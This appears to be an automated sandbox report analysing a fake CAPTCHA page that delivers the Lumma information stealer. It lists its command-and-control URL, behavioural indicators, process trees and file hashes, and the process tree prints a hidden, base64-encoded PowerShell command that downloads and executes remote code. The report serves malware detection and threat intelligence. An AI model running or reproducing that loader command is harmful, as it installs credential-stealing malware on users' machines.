Analysis
-
max time kernel
569s -
max time network
487s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
22-11-2024 08:07
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://check-your-humanity.b-cdn.net/capt-v2.html
Resource
win10ltsc2021-20241023-en
General
-
Target
https://check-your-humanity.b-cdn.net/capt-v2.html
Malware Config
Extracted
lumma
https://candidatersz.cyou/api
Signatures
-
Lumma family
-
Blocklisted process makes network request 7 IoCs
Processes:
PowerShell.exemsiexec.exeflow pid process 57 5440 PowerShell.exe 80 2140 msiexec.exe 83 2140 msiexec.exe 86 2140 msiexec.exe 90 2140 msiexec.exe 97 2140 msiexec.exe 99 2140 msiexec.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Executes dropped EXE 1 IoCs
Processes:
Set-up.exepid process 3472 Set-up.exe -
Loads dropped DLL 9 IoCs
Processes:
Set-up.exepid process 3472 Set-up.exe 3472 Set-up.exe 3472 Set-up.exe 3472 Set-up.exe 3472 Set-up.exe 3472 Set-up.exe 3472 Set-up.exe 3472 Set-up.exe 3472 Set-up.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
PowerShell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetUtilityApp = "C:\\Users\\Admin\\AppData\\Roaming\\QHUPRmIp\\Set-up.exe" PowerShell.exe -
Drops file in System32 directory 1 IoCs
Processes:
PowerShell.exedescription ioc process File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk PowerShell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Set-up.exedescription pid process target process PID 3472 set thread context of 5612 3472 Set-up.exe more.com -
Drops file in Program Files directory 2 IoCs
Processes:
setup.exedescription ioc process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\56df52d0-1b1a-4428-9a25-10d4e5a3b0f2.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241122080745.pma setup.exe -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
more.commsiexec.exeSet-up.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language more.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Set-up.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exePowerShell.exetaskmgr.exepid process 4296 msedge.exe 4296 msedge.exe 3376 msedge.exe 3376 msedge.exe 4648 identity_helper.exe 4648 identity_helper.exe 5440 PowerShell.exe 5440 PowerShell.exe 5440 PowerShell.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
taskmgr.exepid process 5344 taskmgr.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
Set-up.exemore.compid process 3472 Set-up.exe 5612 more.com -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
Processes:
msedge.exepid process 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
PowerShell.exetaskmgr.exedescription pid process Token: SeDebugPrivilege 5440 PowerShell.exe Token: SeDebugPrivilege 5344 taskmgr.exe Token: SeSystemProfilePrivilege 5344 taskmgr.exe Token: SeCreateGlobalPrivilege 5344 taskmgr.exe Token: SeSecurityPrivilege 5344 taskmgr.exe Token: SeTakeOwnershipPrivilege 5344 taskmgr.exe Token: SeSecurityPrivilege 5344 taskmgr.exe Token: SeTakeOwnershipPrivilege 5344 taskmgr.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
msedge.exetaskmgr.exepid process 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
msedge.exetaskmgr.exepid process 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 3376 wrote to memory of 1160 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 1160 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 5084 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 4296 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 4296 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 1488 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 1488 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 1488 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 1488 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 1488 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 1488 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 1488 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 1488 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 1488 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 1488 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 1488 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 1488 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 1488 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 1488 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 1488 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 1488 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 1488 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 1488 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 1488 3376 msedge.exe msedge.exe PID 3376 wrote to memory of 1488 3376 msedge.exe msedge.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://check-your-humanity.b-cdn.net/capt-v2.html1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffaf04246f8,0x7ffaf0424708,0x7ffaf04247182⤵PID:1160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,2826004649836005447,9932182305756327289,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:22⤵PID:5084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,2826004649836005447,9932182305756327289,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4296
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,2826004649836005447,9932182305756327289,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2832 /prefetch:82⤵PID:1488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2826004649836005447,9932182305756327289,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:12⤵PID:3408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2826004649836005447,9932182305756327289,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:12⤵PID:4240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,2826004649836005447,9932182305756327289,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5732 /prefetch:82⤵PID:4272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings2⤵
- Drops file in Program Files directory
PID:2396 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff6c9295460,0x7ff6c9295470,0x7ff6c92954803⤵PID:3264
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,2826004649836005447,9932182305756327289,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5732 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2826004649836005447,9932182305756327289,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:12⤵PID:5768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2826004649836005447,9932182305756327289,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:12⤵PID:5776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2826004649836005447,9932182305756327289,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:12⤵PID:5996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2826004649836005447,9932182305756327289,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:12⤵PID:6004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,2826004649836005447,9932182305756327289,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3160 /prefetch:22⤵PID:5092
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4884
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4152
-
C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w hiDdEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vZmlsZXpjdnNkcy5iLWNkbi5uZXQvZ2t6SGRxZmcudHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5440 -
C:\Users\Admin\AppData\Roaming\QHUPRmIp\Set-up.exe"C:\Users\Admin\AppData\Roaming\QHUPRmIp\Set-up.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:3472 -
C:\Windows\SysWOW64\more.comC:\Windows\SysWOW64\more.com3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:5612 -
C:\Windows\SysWOW64\msiexec.exeC:\Windows\SysWOW64\msiexec.exe4⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:2140
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5344
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1772
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5b9fc751d5fa08ca574eba851a781b900
SHA1963c71087bd9360fa4aa1f12e84128cd26597af4
SHA256360b095e7721603c82e03afa392eb3c3df58e91a831195fc9683e528c2363bbb
SHA512ecb8d509380f5e7fe96f14966a4d83305cd9a2292bf42dec349269f51176a293bda3273dfe5fba5a32a6209f411e28a7c2ab0d36454b75e155fc053974980757
-
Filesize
152B
MD5d9a93ee5221bd6f61ae818935430ccac
SHA1f35db7fca9a0204cefc2aef07558802de13f9424
SHA256a756ec37aec7cd908ea1338159800fd302481acfddad3b1701c399a765b7c968
SHA512b47250fdd1dd86ad16843c3df5bed88146c29279143e20f51af51f5a8d9481ae655db675ca31801e98ab1b82b01cb87ae3c83b6e68af3f7835d3cfa83100ad44
-
Filesize
70KB
MD5e5e3377341056643b0494b6842c0b544
SHA1d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA51283f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef
-
Filesize
469B
MD5cc02cdb347e8cc59a0b37dd6631bba58
SHA152ed6345a49fe99a7232621e4eeafd35777ea4fe
SHA25699eff1c284c9a544fb1379ca5ddc074d1d4200b962fb47158283415c118cb8c1
SHA512c4467b547ee68f95c1c4e639b012d42d2a6b1e1ad9aa331c758aabbf85130dff4a35907c1b47ddfbe78f338cc686004cc59dcfa080e8bf3d48573f7c83f803e2
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State~RFe58b6e7.TMP
Filesize59B
MD52800881c775077e1c4b6e06bf4676de4
SHA12873631068c8b3b9495638c865915be822442c8b
SHA256226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974
SHA512e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b
-
Filesize
5KB
MD5e9e2a27419e0852df60330660bc01c98
SHA1723eb6e6247c42dcf02209a8f069bd0eebd55953
SHA25621cd2b9b096e9d1cf2f4b4574aa9360f051cc980c75fa76b177c6569abbcc777
SHA512eeafc7b47d3baedc37397d82cf7e20bd3ba5c58ba776943e8acbaefce343662847c61180c6b11dca9ea1f1900380b52978210e3fa72419326f83c276c9aef643
-
Filesize
5KB
MD5dd52ed27b8aff99a227df213844e73c0
SHA13ce43b296091a7007eb3d3aaf02df5d255491ead
SHA256877a1e5b98aef615a4b697297834792927edc7f4304672ec9e7bd0bde9b65af8
SHA512298d8098efa75d789999395b975688e9ae52355bbf8f2d7fc344892fdc77375b908f44c733a0011acac3203d224806f2428610e114d8a755c2555aa2e553c636
-
Filesize
5KB
MD53f5ef863593f04ab490d549a2abcf44a
SHA19592f6871f516759929f612a75cba5bb304b9ef0
SHA256fbb65896b50a61b6a17b97ee9bb2998610fb43ad959e378c1532927e71128b0a
SHA512f4b012ac08f5afddd5e886cccf963b47c58322e6c0971944cbbb19541441dbd845b797ca294eb51bd70902c58fbe38234d3e5f2f647c44d62f55b09346b1ddb1
-
Filesize
24KB
MD5f9055ea0f42cb1609ff65d5be99750dc
SHA16f3a884d348e9f58271ddb0cdf4ee0e29becadd4
SHA2561cacba6574ba8cc5278c387d6465ff72ef63df4c29cfbec5c76fbaf285d92348
SHA512b1937bc9598d584a02c5c7ac42b96ed6121f16fe2de2623b74bb9b2ca3559fc7aff11464f83a9e9e3002a1c74d4bb0ee8136b0746a5773f8f12f857a7b2b3cb4
-
Filesize
24KB
MD5d3412a01d4c3df1df43f94ecd14a889a
SHA12900a987c87791c4b64d80e9ce8c8bd26b679c2f
SHA256dd1511db0f7bf3dc835c2588c1fdd1976b6977ad7babe06380c21c63540919be
SHA5127d216a9db336322310d7a6191ebac7d80fd4fa084413d0474f42b6eff3feb1baf3e1fb24172ea8abcb67d577f4e3aea2bc68fdb112205fc7592a311a18952f7e
-
Filesize
41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
10KB
